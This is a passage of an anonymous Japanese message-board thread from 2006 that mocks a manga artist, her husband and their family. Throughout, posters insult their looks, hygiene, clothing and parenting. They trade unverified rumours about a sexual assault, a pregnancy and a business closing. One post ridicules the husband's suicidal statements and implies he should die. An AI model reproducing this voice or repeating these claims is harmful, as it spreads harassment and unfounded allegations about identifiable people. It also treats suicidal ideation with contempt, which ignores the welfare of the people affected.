開きお直り方ひとつ取ってみても、ただ者じゃないよね。

75 :花と名無しさん:2006/10/06(金) 08:21:49 ID:???0
夜更かしすると肌は荒れるし体臭口臭きつくなると抜け毛が増えてスキンヘッドにしなければならなくw

>>74
開き「お直り方」ってwwwwwwwww
どこの姫ですか?wwwwwww

76 :花と名無しさん:2006/10/06(金) 08:37:38 ID:???0
>>73
そもそも「粘着アンチ」って、その人の事を指す言葉だったよね。
いつの間にかアンチ全体を指す言葉みたいになってるけど。

77 :花と名無しさん:2006/10/06(金) 09:26:02 ID:???0
新スレ立つたび必死だね

78 :花と名無しさん:2006/10/06(金) 09:56:17 ID:???0
終わっても良さそうなものなのにスレを続ける執念はどこから来るんだろう。
叩くネタもないし、もっとまともな批判してみせなよ。

79 :74:2006/10/06(金) 11:17:54 ID:???0
>75
すいません。
タイプミスでした。

80 :花と名無しさん:2006/10/06(金) 11:30:28 ID:???0
75は本当に性格キツいな。
この強者揃いの板の中でも特に目立つよ。ある意味才能だな。

81 :花と名無しさん:2006/10/06(金) 14:30:10 ID:???0
実際は好きで好きでしょうがないんでしょ。
でも相手にしてもらえず、恨みに変わった。
ストーカーみたいなもんだよ。
そのうち殺しにいかなければいいがね。

82 :花と名無しさん:2006/10/06(金) 16:03:35 ID:???0
マイコのブログってどこにあるの?

83 :花と名無しさん:2006/10/06(金) 17:43:28 ID:???0
>>82
>>6


84 :花と名無しさん:2006/10/06(金) 19:44:07 ID:???O
>>78
執念ではないんじゃないか。むしろ惰性。
執念と表すことができるのも中にはいるよね。


しかしいい年して痛いやつだな、ラリさんは。
亀田(ドキュ)ぶって喜んで何が楽しいのかな?


スキン+日焼け、まさかカラコンも健在なのかッ!?

85 :花と名無しさん:2006/10/06(金) 19:55:59 ID:???0
>>83
ありがとう

86 :花と名無しさん:2006/10/06(金) 23:36:39 ID:???0
ラリゴ、激弱い亀田みたい

87 :花と名無しさん:2006/10/07(土) 09:48:12 ID:???0
ドキュ具合は亀田クラス

88 :花と名無しさん:2006/10/07(土) 14:25:10 ID:???0
ババアの焼肉 でググると結果が結構笑えます。

これって既出?


89 :花と名無しさん:2006/10/07(土) 21:10:14 ID:???0
事実ババアが店主にしろ、狂気に満ちた臭中年に
ババア、ババアなんて全国発信してほしくないよなw

90 :花と名無しさん:2006/10/08(日) 09:30:30 ID:???0
漫画のラリゴですらキモイ

91 :花と名無しさん:2006/10/08(日) 10:17:47 ID:???0
そういえば発売日過ぎたのに感想ないねw
ネタバレもないしww

92 :花と名無しさん:2006/10/08(日) 17:26:49 ID:???0
要するに別居が決定なんだよね?

93 :花と名無しさん:2006/10/08(日) 17:50:47 ID:???0
このまま離婚だな

94 :花と名無しさん:2006/10/08(日) 23:06:06 ID:???0
今月号読んだけど別居の理由が分らなかったよ。
仕事ってナンダ?


95 :花と名無しさん:2006/10/08(日) 23:20:42 ID:???0
キモイせりふで女釣る仕事なんじゃね?

96 :花と名無しさん:2006/10/08(日) 23:35:13 ID:???O
夫すごろくではなくなってきたな>今月号
別居中ならネタ少ないべ

97 :花と名無しさん:2006/10/08(日) 23:59:26 ID:???0
実際ラリゴネタに無理を感じる今号

98 :花と名無しさん:2006/10/09(月) 00:11:24 ID:???0
たぶん・・・ノーパンで寝ているところを、ここでネタにされるのを期待して描いたのだろうなw

99 :花と名無しさん:2006/10/09(月) 00:13:05 ID:???0
姑はもう家政婦扱いだね

100 :花と名無しさん:2006/10/09(月) 03:59:22 ID:???0
二世帯ってこういう時に不便だって気づくね
このまま離婚したらどうすんだあ


101 :花と名無しさん:2006/10/09(月) 09:39:59 ID:???0
セックスレスなのだし、婚姻による優遇度(税金とか)のためだけ婚姻関係でしょ
だから離婚はないでしょう

102 :花と名無しさん:2006/10/09(月) 13:35:03 ID:???O
ラリゴ、バイクがきたの嬉しいんだなw
でもブログに載せるのはバイクの写真だけでいいから。

103 :花と名無しさん:2006/10/09(月) 14:01:19 ID:???0
しかし弛み具合がきんもー☆

104 :花と名無しさん:2006/10/09(月) 17:40:54 ID:???0
結構、教育ママ(死語)してるね
意外であった

105 :花と名無しさん:2006/10/09(月) 18:37:20 ID:???0
あのバイクの写真見て、ちょっとカコイイ(バイクが)と思ってたけど
「すごろく」読んだら、チョイノリか〜。
そら、北海道に送るのもラクだろうけど
チョイがそんなにスピード出るとは、バイク板でも聞いた事ないんだが。

106 :花と名無しさん:2006/10/10(火) 22:54:24 ID:???0
チョイノリ・・・・ぷぷぷぷぷ


107 :花と名無しさん:2006/10/10(火) 23:20:43 ID:???0
チョイ悪オヤジにはぴったりのチョイノリwwwww

108 :花と名無しさん:2006/10/11(水) 08:00:07 ID:???O
チョイ、いいね、使えるね!


チョイゴリとかね!
でもチョイどころじゃなくひどくラリゴだからだめかー。

109 :花と名無しさん:2006/10/11(水) 10:44:35 ID:???0
セコイ人間性にピッタリだけど、他のユーザーが可哀相

110 :花と名無しさん:2006/10/11(水) 11:59:09 ID:???0
あー、でもあのチょイの写真をよくよく写真見たら、改造しまくってるし
もしかしたら、エンジンも速く走れるようにしてるかもしれないです。
原付二種にして、「チョイだけど早い!」と調子乗ってるかも。

そんな改造チョイが道路を走ってると、
車にもバイクにも迷惑な気がしますが。

111 :花と名無しさん:2006/10/11(水) 12:09:54 ID:???0
チョイ臭仕様のラリゴ原チャ

あの年で改造(しかもチョイノリww)を
アピールなんてどこまで精神年齢低いんだか・・・
メットにファイヤーの模様でも入れてたら笑うわ。

112 :花と名無しさん:2006/10/11(水) 12:20:15 ID:???0
前にこの年で前髪があるのってどうよ?」って言ってたのに坊主にしたんだね。
何がきっかけなんだ

113 :花と名無しさん:2006/10/11(水) 12:40:54 ID:???0
ハゲを誤魔化す
そして日焼けをする
ハゲがほんのちょっとだけ目立たなくなる
ラリゴにっこり

114 :花と名無しさん:2006/10/11(水) 12:52:34 ID:???0
あーハゲてきたからかー

115 :花と名無しさん:2006/10/11(水) 12:59:39 ID:???O
ラリゴにっこりを想像して吐いた

116 :花と名無しさん:2006/10/11(水) 13:29:44 ID:???0
精神年齢相当低いからね
しかもすぐに飽きるし
どれだけ子供なんだよキモイから

チョイノリ改造して意気揚々と気取ってる中年を
想像しただけで可哀想だね


117 :花と名無しさん:2006/10/11(水) 15:44:51 ID:???0
あの写真をどこをどう見たら、チョイに見えるのかと…。
無知をさらして叩くのもいい加減この辺りでやめておいた方がry

118 :花と名無しさん:2006/10/11(水) 16:12:49 ID:???0
マンガに描かせるラリゴが悪い

119 :花と名無しさん:2006/10/11(水) 20:05:42 ID:???0
101の知ったかぶりに寒気。

120 :花と名無しさん:2006/10/11(水) 20:13:56 ID:???0
亀レスの上にネタにマジレスで寒気。

121 :花と名無しさん:2006/10/11(水) 21:14:23 ID:???0
中の人、スルー出来なさ過ぎてバレバレ

122 :花と名無しさん:2006/10/11(水) 21:38:04 ID:???0
>>117
はいキタ━━━━(゚∇゚)━━━━ !!!!!
や〜い
ひっかかった、ひっかかった
チョイノリださっwwwwwwwww

123 :花と名無しさん:2006/10/11(水) 23:25:56 ID:???0
>>117
いろいろ調べんですが、チョイノリの改造としか思えないのですがw

あ、個人的にはチョイノリはいいバイクだと思いますよ。
近場で移動したりするには。

いいオッサンが改造して、思わせぶりに小出しに写真をブログで
出してて、悦にいってるところで
ミカリンが漫画で
「チョイ乗りってスクーター買った」というタイミングがテラワロス

124 :花と名無しさん:2006/10/12(木) 00:45:16 ID:???0
てか、本人がブログでチョイノリ買わなくて良かったって書いてるじゃん。
それも随分前に。

125 :花と名無しさん:2006/10/12(木) 10:41:01 ID:???0
キモブログ、最近見てないw

126 :花と名無しさん:2006/10/12(木) 12:11:20 ID:???0
ちゃんと嫁よ。池沼ども。
ホンダのエイプだよ。

127 :花と名無しさん:2006/10/12(木) 13:23:23 ID:???0
ほー。
エイプのタンクに「SUZUKI」ってロゴを入れてもらっちゃってる?
それってカコイイ?

128 :花と名無しさん:2006/10/12(木) 13:41:58 ID:???0
ホンダ車にスズキのロゴって、どこまで変態なんだろ・・・

129 :花と名無しさん:2006/10/12(木) 14:13:37 ID:???0
ネタにマジレス乙

130 :花と名無しさん:2006/10/12(木) 15:05:23 ID:???0
マジレスと思わなければやってられないですよねw
理想の食いつきが全く無くてw

131 :花と名無しさん:2006/10/12(木) 16:58:55 ID:???0
ぐっちとニコちゃん―ミカリンの子育てBOX

この本って最近発売されたみたいだけど、すごろくの寄せ集めみたいな本かな?

132 :花と名無しさん:2006/10/12(木) 17:10:22 ID:???0
そうです

133 :花と名無しさん:2006/10/12(木) 19:14:28 ID:???0
>>126
ヲチャなんだからブログなんて読んでんだよ
もったいぶってるラリゴに牽制
だからあえて

チ ョ イ ノ リ

ラリゴはチョイノリに乗ってる事に決まり!!!!

134 :花と名無しさん:2006/10/12(木) 19:29:10 ID:???0
チョイゴリがお似合いだゼ!

135 :花と名無しさん:2006/10/12(木) 20:12:20 ID:???0
Tシャツもう作んないのー?
マイコが仕事なくて暇だろうに。

136 :花と名無しさん:2006/10/12(木) 20:27:35 ID:???0
売れなくて知人にタダで配ってもまだ在庫びっしりなんだよ!!

137 :花と名無しさん:2006/10/12(木) 21:46:58 ID:???0
そういえば、ばばのパッチワークの店とかどうなったんだろうね?w

138 :花と名無しさん:2006/10/12(木) 21:56:08 ID:???0
きまぐれコットンパッチ

バザーで叩き売りw

139 :花と名無しさん:2006/10/13(金) 00:44:52 ID:???O
>>136
もはやゴミ通り越して呪いのてーしゃつだなwww

140 :花と名無しさん:2006/10/13(金) 07:55:15 ID:???0
チョイノリを検証して書き込んでたら
否定するようなレスがついて驚いたw

ほんとにラリゴだけは擁護レスがつくんだねw

141 :花と名無しさん:2006/10/13(金) 08:00:13 ID:???O
ラリゴの時いかにも自演チックな擁護&荒らしがわくが、黒のときも変な住民叩きがわく
・ババァ!ひがむな系


142 :花と名無しさん:2006/10/13(金) 08:48:50 ID:???0
この流れ意味不明。
一人がわめいてるようにしか見えない。

143 :花と名無しさん:2006/10/13(金) 09:17:35 ID:???0
そう?私を含む何人かのヲチャがあまりにネタ投下がないので
みんなゆるーく咬んでるだけでしょ。

144 :花と名無しさん:2006/10/13(金) 09:45:13 ID:???0
今さらだけど、いつも1人1人と書く>>142が一番1人だね

145 :花と名無しさん:2006/10/13(金) 09:49:05 ID:???0
もうネタがないだけだよ。

146 :花と名無しさん:2006/10/13(金) 10:55:03 ID:???0
ラリゴが身を挺してネタ提供w

147 :花と名無しさん:2006/10/13(金) 13:54:57 ID:???0
>>137
私も気になってたんだけど
ちゃんと店構えてやってんのかな

>>142
私は105のレスでチョイノリじゃないのは知ってたけど
ラリゴが相当こだわってるらしいバイク選びで馬鹿やる事
をあまりにももったいぶりすぎて一部の人にマジで
チョイノリに乗ってると思われたらたまらなくなって
出てこないかなと思ってチョイノリ連呼してたけど


148 :花と名無しさん:2006/10/13(金) 14:46:24 ID:???0
事実たまらなくなって出てきてるしw

149 :花と名無しさん:2006/10/13(金) 18:51:54 ID:???0
会社たたむって噂はマジなのかね。
正確には個人事務所をやめて、誰かと共同になるとかだけど。

150 :花と名無しさん:2006/10/13(金) 19:02:12 ID:???0
そりゃ個人では無理だろw
もともと陰で操ってくれるヤツがいたから独立しようとしただけであってwww

151 :花と名無しさん:2006/10/13(金) 19:03:32 ID:???0
えー。
他人と組むのは失敗してこりたくせにね。
また誰かが泥かぶるのか。最低。

152 :花と名無しさん:2006/10/13(金) 21:29:14 ID:???0
まあそうやってどんどん仲間減らして孤立したいんだろ

「誰も俺をわかってくれない」と駄文書く?
そういえば些細の映像化はどうしたのよ?

153 :花と名無しさん:2006/10/13(金) 22:23:29 ID:???0
で、結局ミスター]だっけ?
その人が裏切った事ってナンだった訳?
マイコが襲われたって解釈してるんだけど合ってるかしら

154 :花と名無しさん:2006/10/13(金) 22:31:37 ID:???0
マイコを襲っておいて逆切れしたんでしょ
まあ煽てられていい気になった義兄のせいでマイコもロクなことないね。
ハワイに行っても放置されるし。

155 :花と名無しさん:2006/10/14(土) 02:25:57 ID:???0
真実とガセが入り乱れてるスレだ…

156 :花と名無しさん:2006/10/14(土) 03:25:54 ID:???O
今さらなんですが、高木さんのブログ初めて読みました。
色々な女性との出会いが書かれてますが
あれは実話?それとも高木さんの妄想?

痩せたスズメみたいな女の子の話気持ち悪い…

157 :花と名無しさん:2006/10/14(土) 09:50:04 ID:???0
そんな丁寧な口調でラリゴを全否定

そのままです。

158 :花と名無しさん:2006/10/14(土) 10:15:02 ID:???0
そうだったらいいのにな♪

そうじゃないから妄想駄文書こう♪

159 :花と名無しさん:2006/10/16(月) 13:26:21 ID:???0
ミカリンのお強請り戦勝報告がブログにUP
送り主の人もこれからずっと名前が出され続けるんだろうな
余計NHKに受信料払ってることが腹立たしくなるわw

160 :花と名無しさん:2006/10/16(月) 17:42:49 ID:???0
>>159
見てきた。
有名人だからDVDや紅茶がもらえるんだよね?
フツウの小学生が質問したところで缶入りのターシャ紅茶はもらえないよね。
ほんと戦勝報告って感じですた。

161 :花と名無しさん:2006/10/16(月) 23:49:11 ID:???0
ハワイの大地震はお強請りに負けたからだなw

162 :花と名無しさん:2006/10/17(火) 00:41:54 ID:???0
意味不明

163 :花と名無しさん:2006/10/17(火) 10:02:34 ID:???0
シャクレがお強請りして披露するから
ラリゴが自分に酔った写真を載せるから

ハワイに地震が起こったのでしょw
こんな奴らに好かれたハワイもいい迷惑だww

164 :花と名無しさん:2006/10/18(水) 10:18:00 ID:???O
>>154
どこかに書いてあるの?

165 :花と名無しさん:2006/10/18(水) 10:36:33 ID:???0
>>164
前々スレぐらいだっけ?

166 :花と名無しさん:2006/10/19(木) 13:15:47 ID:???0
           , ..--、_
         ,‐'"〃ゞ、::ヽ、
       _,ィ:::::::::::::::::::::ヽ `i、
      ,r"::::::::::::::::::::::::::::::Z、 _\
      ,!::::::::::::::::::::::::::::::::::::::ヽ_,,彡、
    ィ::::::::::::::_,,,、、 ,,_,,..::::::::::::`i彡ヽ.
     {::::::ミ/   ̄   `ヽ、:::::ヽ、ヒ',
.    |:::::ミ/          `lミ:::::::::ヽ
     |::::::{ ,-‐‐、  ,-‐‐、  |ミ::::::::::::::}
    l:::::::| ィtテ l   ィtテ、  iヽ::::::::::l
    ';::::::}    i'       {:::::::::::::/
     {:::゙}   く__,.ヽ    /:::::::::ソ
     /::::',  、__、,_,    /::::::/'
     ゞ、:ヽ  ー     /::::::ノ
     i''";;;;;;ヽ、 __,-‐''l;;;;;|
 _,, -‐''";;;;;;;;;;;;;;;;;;;;;;;ヽ、,r‐'";;;;;;`‐- 、

    マエス・レー[Maesu Ree]
    (1863〜1910 オーストリア)


167 :花と名無しさん:2006/10/22(日) 21:10:18 ID:???0
40過ぎて肌を焼くとウンコ色だよね

168 :花と名無しさん:2006/10/22(日) 22:00:02 ID:???0
ラリゴは特に清潔感が無いからね。
体臭&口臭の話聞いてからもうだめ。うんこにしか見えない。

169 :花と名無しさん:2006/10/23(月) 13:39:05 ID:4pugODGk0
うん

170 :花と名無しさん:2006/10/23(月) 13:39:42 ID:???0
あ?

171 :花と名無しさん:2006/10/23(月) 21:46:57 ID:???0
シートの印刷は下からやれってマイコに教えてやれよ焼きウンコ

172 :花と名無しさん:2006/10/28(土) 11:54:40 ID:???0
時間つぶしの為、数年ぶりにフィーやんとコーラスを立ち読み。
二世帯住宅に実母が居座ってたり、
子供を英語漬けにしようともくろんで(子は自分のおもちゃ?)たり、
ただの野菜のトマト煮をレシピとして紹介してたり、
やはり、この人は馬鹿なんだなとつくづく思いました。

173 :花と名無しさん:2006/10/31(火) 18:01:27 ID:tHIUlqgk0
閑散…

174 :花と名無しさん:2006/10/31(火) 19:22:31 ID:???0
ウンコ焼きも面白くないしね
あと8日でフィーヤンでるからそれまで

http://item.rakuten.co.jp/book/4165950
結婚式の話はまた使いまわしか?

175 :花と名無しさん:2006/10/31(火) 19:23:16 ID:???0
ここらでラリゴにっこり

176 :花と名無しさん:2006/10/31(火) 21:11:29 ID:???0
うわっ
すれがふしゅうに
つつまれた

177 :花と名無しさん:2006/11/01(水) 04:58:16 ID:???0
しゃくれ妊娠ってデマだったのかね

178 :花と名無しさん:2006/11/02(木) 21:01:55 ID:???0
思ったことだったで結ぶの好きだな

179 :花と名無しさん:2006/11/02(木) 23:19:26 ID:???0
文才ないから

180 :花と名無しさん:2006/11/03(金) 09:44:18 ID:???O
ラリゴの最近の写真てどこでみれるのー?

181 :花と名無しさん:2006/11/03(金) 10:09:19 ID:???0
>>180
>>6


182 :花と名無しさん:2006/11/03(金) 15:32:37 ID:???0
鼻毛ぼうぼうw

183 :花と名無しさん:2006/11/03(金) 17:42:20 ID:???0
たたでさえみっともないナリしてんのに、行動言動まで汚らしいからなw

184 :花と名無しさん:2006/11/07(火) 23:06:06 ID:???0
早瓜ゲッターにも素通りされてるなぁ

ブクオフでは105円コーナーだしそろそろ打ち止めか?>すごろく

185 :花と名無しさん:2006/11/08(水) 00:46:20 ID:???0
そういえば明日発売日だったね。

186 :花と名無しさん:2006/11/08(水) 15:57:01 ID:???0
早売りゲトして読んだけど内容忘れたよ。
とりあえずぐの体がボロボロってのしか覚えてない。

187 :花と名無しさん:2006/11/08(水) 20:40:13 ID:???0
・下、を階下、と書いて柔軟性を表現しているつもりか?
・まだ小麦アレルギー引っ張る
・さりげなく姑とは仲が良い描写
・無駄遣いは焼きウンコの所業にしたいらしい
・グのジャンク菓子、アイスを食べまくっていたのを容認したのはシャクレだ
・倒れる寸前でも英語の試験は受けさせる鬼畜シャクレ
・今さらの日本書紀で5コマ潰すほどの話か?
・そして学校は休むグ
・筆ペンで成績があがったと決め付け
・ザリガニ、何を表現したいのかさっぱり
・もらった菓子の絵、写真の加工だな
・お菓子のお返しに、負けず嫌い発揮すんなよ


シャクレは愚痴お強請り悪口を描かないと、禿どうでもいいつまらん話しか描けないな。
その描けなさ具合にも程がある、くらい描けてない。

188 :花と名無しさん:2006/11/08(水) 21:04:54 ID:???0
愚痴お強請り悪口を描いても、ここでしか盛り上がらないしw

ここしばらく子供ネタしかないし、それも成長して面白みが無いし
夫モノも商売気だしまくりで更につまらん。

189 :花と名無しさん:2006/11/09(木) 09:20:32 ID:???0
ぐがまだ子供なのに冷え性やドロドロ血液による病気になりやすいとか・・・
まさに親の管理不足なんじゃないの・・?

190 :花と名無しさん:2006/11/09(木) 10:12:37 ID:???0
事実、親の管理放棄

191 :花と名無しさん:2006/11/09(木) 11:52:05 ID:???0
>>189
マンガに描いてあるの?kwsk

192 :花と名無しさん:2006/11/09(木) 12:04:39 ID:???0
>>191
もう発売してんだから立ち読み

193 :花と名無しさん:2006/11/09(木) 19:10:28 ID:???0
立ち読める場所が徒歩・自転車圏内にないよ〜
なので187さんのレポありがたかった

194 :花と名無しさん:2006/11/09(木) 21:22:04 ID:???0
ようするに菓子の食いすぎて体の具合が悪くなった。
工作で指を切って出血したら、血が流れずドロドロしていたとのこと。

195 :花と名無しさん:2006/11/10(金) 01:30:13 ID:???0
うわっ、気持ち悪ーーーーーッ
子どもでそんなって…

196 :花と名無しさん:2006/11/10(金) 11:24:50 ID:???0
急性中耳炎と鼻腔炎になって、抗生物質投与しても効かなかったんだよね・・
冷え性でドロドロ血液タイプの人が陥りやすい病気に、ぐももれなくかかったと。で、ミカリソがネットで調べると「体質改善」の文字が。
甘いものの食べすぎや冷たいものの食べすぎが原因と考えられて、
ぐは心を入れ替えてお菓子断ちしようとするんだけど・・・・・
「言ってもきかないから」とお菓子の暴食を許してたのってミカリソでしょ?
なのに「ぐは心を入れ替えたようだ・・」みたいな描き方になんかモニョった。

197 :花と名無しさん:2006/11/10(金) 13:11:28 ID:???0
そもそも赤ちゃん時代から「反応が見たい」と言う理由で
甘い物を与えまくってたのもミカリンだもんね。
ぐっちゃんもこの機会に食生活の大事さに目覚めるといいね。
母は頼りにならないと割り切って、頑張ってクレ。

198 :花と名無しさん:2006/11/10(金) 14:09:00 ID:???0
子供で実験かよ・・・

親権剥奪クラスの虐待だ・・・

199 :花と名無しさん:2006/11/10(金) 18:45:58 ID:???0
ぐっちゃんって家族の中で一番身体が丈夫、みたいな描かれ方を
ずーっとされてきたから意外
本当は怖い家庭の医学だっけ?あれを欠かさずみてるわりには
自分たちの食生活がヤバイって気づかなかったのが不思議

200 :花と名無しさん:2006/11/11(土) 14:08:12 ID:???0
やっぱシャクレ節健在だね
愚痴悪口書かなくてもドキュすぎる

201 :花と名無しさん:2006/11/11(土) 16:13:59 ID:???0
ラリゴ、何で福島に行ってるの?

202 :花と名無しさん:2006/11/11(土) 16:19:41 ID:???0
なんでそんなこと知ってるの?


203 :花と名無しさん:2006/11/13(月) 19:53:00 ID:???0
今月号読んだ。ぐっちゃんかわいそうに・・・。
「言っても聞かないから」っていう理由で子供にきつく言わない親の
典型って感じだなあ・・・。親としての責任を全然感じてない
描き方で、他人事みたいだし。

204 :花と名無しさん:2006/11/14(火) 14:08:16 ID:c2wNUHFG0
お菓子ばっかり食ってたらそうなるわな・・・
英語の勉強よりも食育をちゃんとしたほうがよいね

205 :花と名無しさん:2006/11/14(火) 16:15:14 ID:???0
しかもかなりの偏食で、ピザはパン部分のみ・・・。
「むじんぞうに食べるアイス」って書いてあったけど、
そのアイスを買う金を与えたのは・・・親や周囲の大人でしょうに。

206 :花と名無しさん:2006/11/14(火) 17:55:19 ID:???0
人格とは日々の食事からなんだねえ・・・としみじみ思った今号

207 :花と名無しさん:2006/11/14(火) 20:12:53 ID:???0
ぐのつくお方、かわいそうです。
親が馬鹿なあまり、子供にモロ影響していますね。
夫のDNAで、頭はまあまあいいみたいですが、全国区ではどうかな〜。
夫の高校は全道No1.2を争う、超進学高でしたが、所詮北海道。
私も北海道人w

みかりんよ、ぐっちに逆転されるよ!!

208 :花と名無しさん:2006/11/14(火) 20:47:24 ID:???0
どんなに進学校でも、早稲田の二部・・・

209 :花と名無しさん:2006/11/15(水) 11:00:00 ID:???0
えっ、二部だったの?初めて知ったんだけど・・黒ハゲどころか詐欺ハゲ。

>>206
ぐっちゃんが幼少時には食育に凝ってて色々本買ってたよ。
幕内秀夫?だっけ、粗食の薦めみたいなシリーズ。
結局続かなかったという事か・・・

210 :花と名無しさん:2006/11/15(水) 18:14:22 ID:???O
>>209
それってつい最近じゃなかった?
本を読み漁って辿り着いた結論が
「米を食え」だったよね

211 :花と名無しさん:2006/11/16(木) 08:14:37 ID:???0
過去に何度かその手の極端な健康法に飛びついてるんだよね。
ちっとも身につかないみたいだけど・・・
長続きする副鼻腔炎はCT撮って詳しく調べるが吉。

212 :花と名無しさん:2006/11/21(火) 22:03:45 ID:???0
気をつけるのは一時で、またすぐジャンク菓子漬けだろ
何ごとも長続きだけは絶対しない一家だからw

213 :花と名無しさん:2006/11/23(木) 01:08:17 ID:???0
パジャマみたいな服ですねw

214 :花と名無しさん:2006/11/23(木) 11:15:57 ID:Y2gNFSG/O
すごろく6巻はいつ頃出るのでしょうか。
待ち遠しいです。

215 :花と名無しさん:2006/11/23(木) 11:37:42 ID:???0
NEWS!!
わたちの書いた漫画が発売されま〜す!

ってメール自分で打つんでしょ。

216 :花と名無しさん:2006/11/23(木) 12:41:38 ID:???0
待ち遠しいのは印税が入る人だけですねw

217 :花と名無しさん:2006/11/23(木) 12:45:20 ID:???0
ラリゴのブログにミカリン登場!!!


218 :花と名無しさん:2006/11/23(木) 12:50:15 ID:???0
今さらだけどハンニャだねえw

219 :花と名無しさん:2006/11/23(木) 12:52:47 ID:???0
そういえば、自殺願望だとか廃人だとか書く奴に限って長生きだよな・・・

220 :花と名無しさん:2006/11/23(木) 13:21:23 ID:???0
お婆ちゃんを「観察」・・・


221 :花と名無しさん:2006/11/23(木) 15:55:08 ID:???0
あの自殺願望のくだり
マジで爆笑しちゃったんだけどさ
あのタイミングで文章に入れるか?

ミカリンせっかく上京したのにカワイソ

222 :花と名無しさん:2006/11/23(木) 16:16:51 ID:???0
昔の有名な物書きの人が結構自殺してるから
それに憧れてるんでしょ。まさに永遠の中2病。
精神系の薬の量をいちいち書いてみたり、自殺願望とか
書いてるラリゴ、恥ずかしくないのかな?

バカは死ななきゃ治らない。だから今すぐ・・・

223 :花と名無しさん:2006/11/23(木) 16:21:08 ID:???0
シャクレの服のセンスにずっこけた。

224 :花と名無しさん:2006/11/23(木) 16:52:23 ID:???0
死にたいとかシャクレにメールしたんだろうなw

225 :花と名無しさん:2006/11/23(木) 17:11:28 ID:???O
シャクレ腹大きくない?

226 :花と名無しさん:2006/11/23(木) 17:53:27 ID:???0
空港の写真では、中に着ている服をズボンの中に入れて、ウエストはベルトがっちりだけど・・・
中年太りならともかく、妊婦には見えないね。初期の場合を除いて。

227 :花と名無しさん:2006/11/23(木) 18:34:20 ID:???0
シャクレのピエロみたいな服、パジャマみたいですげーな。
あれで大都会東京を闊歩していたのか。さすが!

228 :花と名無しさん:2006/11/23(木) 20:41:36 ID:???0
みかりん可愛いのでちょっとおどろいた

229 :花と名無しさん:2006/11/23(木) 20:51:27 ID:???0
そ、そう?

230 :花と名無しさん:2006/11/23(木) 21:14:50 ID:???O
眼科行った方がいいのでは…

231 :花と名無しさん:2006/11/23(木) 21:23:18 ID:???0
ちょっと目が外斜視で、爆笑問題太田の嫁にそっくりなシャクリソ

232 :花と名無しさん:2006/11/23(木) 23:08:18 ID:???0
デコオープンでさらにシャクレが目立つのら

233 :花と名無しさん:2006/11/24(金) 00:13:39 ID:???O
国会議事堂前の写真はちょっと可愛く写ってる。
太田の嫁、似てるかも。

234 :花と名無しさん:2006/11/24(金) 01:30:18 ID:???0
国会議事堂前の写真、ちょっと可愛く見えるのは顎が隠れてるから?
あれ、首元何巻いてるのかね?
ストールにしては何かシャカシャカいいそうな素材に見えるし
胸に三角に垂れてるから涎掛けみたいだ

235 :花と名無しさん:2006/11/24(金) 06:17:20 ID:???0
なんにせよビックリセンスだな
あの格好で連れまわしたのかと思うと、見ているほうが恥ずかしい・・・

236 :花と名無しさん:2006/11/24(金) 10:52:13 ID:???0
ミカリンって男顔だから水玉とかギャザーが激しく似合ってなくて
それがダサさの原因の1つになってるよね
体型は細めなんだから
ふつーのサラっとしたパンツスーツとかにすればいいのに

それより萬女史、写真みた時になんで掃除のおばちゃんが客と話し込んで
るの?って勘違いしてしまったほど所帯じみててビックリした
(シュークリームってもしかしてすごい安月給なのか?)
確かに幽霊みたいな40女二人に囲まれたらルームサーヴィス取って
夜景みてても自殺願望わくかもしれんとちょっとゴリラに同情した


237 :花と名無しさん:2006/11/24(金) 11:04:18 ID:???0
よろず、昔見た写真と全然別人じゃんw

化粧が濃いとしても別人すぎる・・・

238 :花と名無しさん:2006/11/24(金) 11:13:30 ID:???0
フリルとかドレッシーなのが好き(はあと)って描いてたよね<男顔
赤ちゃん言葉を話すキャラとか、でちた、まちたの話し方とか
ちょっと中身は子供っぽいのかな

239 :花と名無しさん:2006/11/24(金) 11:48:55 ID:???0
でもさー
昔はモヒカンにしてたんだよね
あんなファンシーな中身でパンクス気取りだったのか

240 :花と名無しさん:2006/11/24(金) 12:59:53 ID:???0
まちゃまちゃの髪型、水玉フリフリ服にパンク系ゴツイブーツを履いたシャクレを想像した。フツーに恐怖だ。

241 :花と名無しさん:2006/11/24(金) 13:54:31 ID:???0
バグダッド・カフェの女主人に似てる。

242 :花と名無しさん:2006/11/24(金) 14:00:17 ID:???0
>>241
顔長いけどしゃくれてない

243 :花と名無しさん:2006/11/24(金) 16:00:55 ID:???O
あのパジャマ服、誰も止めてくれなかったのか?
よりによって一番似合わないテイストだよね
黒のVネックセーターとかシンプルな方が似合いそう

244 :花と名無しさん:2006/11/24(金) 16:45:23 ID:???0
ファンシー好きは悪くないけど家具とか装飾品で我慢してればいいのに。



245 :花と名無しさん:2006/11/24(金) 21:15:32 ID:???0
でもミカリンのアゴの長さからしたら
パンツスーツとかシャープな格好したら余計男っぽくなりそうだし
苦肉の策でたどり着いたファッションがフリフリ水玉になってるんじゃないの?
本人もきっとアゴもぎとりたいと思ってると思う

246 :花と名無しさん:2006/11/24(金) 21:24:08 ID:???0
収納名人の先生ですか?って感じ

247 :花と名無しさん:2006/11/24(金) 21:30:45 ID:???0
もともとのセンスが悪いから何を着ても・・・

248 :花と名無しさん:2006/11/24(金) 21:52:39 ID:???0
俺は廃人だ。

ちょww ハライテ

249 :花と名無しさん:2006/11/24(金) 22:45:48 ID:???0
本物の廃人に失礼ですよね

250 :花と名無しさん:2006/11/25(土) 14:47:56 ID:???0
アルプスの少女

251 :花と名無しさん:2006/11/25(土) 14:53:58 ID:???0
世界一の勘違い臭中年 ラリゴ(焼きウンコ)

252 :花と名無しさん:2006/11/25(土) 17:34:31 ID:???0
  /i               iヽ 
  ! !、      ___        / ノ 
  ヽ ヽ、 ,彡フ ̄  ̄ヽミミ、/ / 
   ヽ フ''         く /   
    _ 〉'           ヽ/,_ 
   (ヽi,      /;ヽ       i/ ) 
    i ! ,,_____ノ、i;;iヽ、_____、 i i 
     ! 'ヽ__●ノ' 'ヽ_●,ノ ,ノ i 
    !、jヽ、 ,-   ;; -、 / _ノ 
     〉 /,、''`ヽ__/` ' ,、'  )  
     '!, ヽ`t-,、__, -'イ/  /
     ヽ ヽt,=,='='=イi  /  
      \ `'"~⌒~"' ノ   
        `-- ^-- '  

253 :花と名無しさん:2006/11/26(日) 02:58:51 ID:???O
あの餡蜜?の写真よく見ると、パジャマ服の下に蛇皮のパンツ合わせちゃってるよ−−−
ファンシーとハードテイスト夢のコラボですか?
すごろくだとお洒落さんの様に書いてましたが、センスに脱帽でございます。

254 :花と名無しさん:2006/11/26(日) 09:06:55 ID:???0
夫婦揃ってどこで買うんだそんな服・・・だな

255 :花と名無しさん:2006/11/26(日) 10:03:06 ID:???0
やっぱヨージヤマモトだべ。
とバブルセンス全開のゴリラが申しております。

